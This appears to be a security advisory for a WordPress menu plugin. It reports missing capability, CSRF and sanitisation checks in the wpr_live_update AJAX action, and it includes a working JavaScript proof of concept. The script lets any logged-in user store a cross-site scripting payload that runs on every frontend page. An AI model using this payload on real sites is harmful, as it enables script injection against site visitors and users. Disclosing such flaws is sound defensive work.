The plugin does not have capability and CSRF checks in the wpr_live_update AJAX action, as well as do not sanitise and escape some of the data submitted. As a result, any authenticated, such as subscriber could update the plugin's settings and perform Cross-Site Scripting attacks against all visitor and users on the frontend
fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>", "method": "POST", }) .then(response => response.text()) .then(function(data) { console.log(data); fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "action=wpr_get_transient_from_data", "method": "POST", }); }); The XSS will be triggered in all frontend pages
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-26 (about 1 years ago)
2022-01-26 (about 1 years ago)
2022-04-09 (about 9 months ago)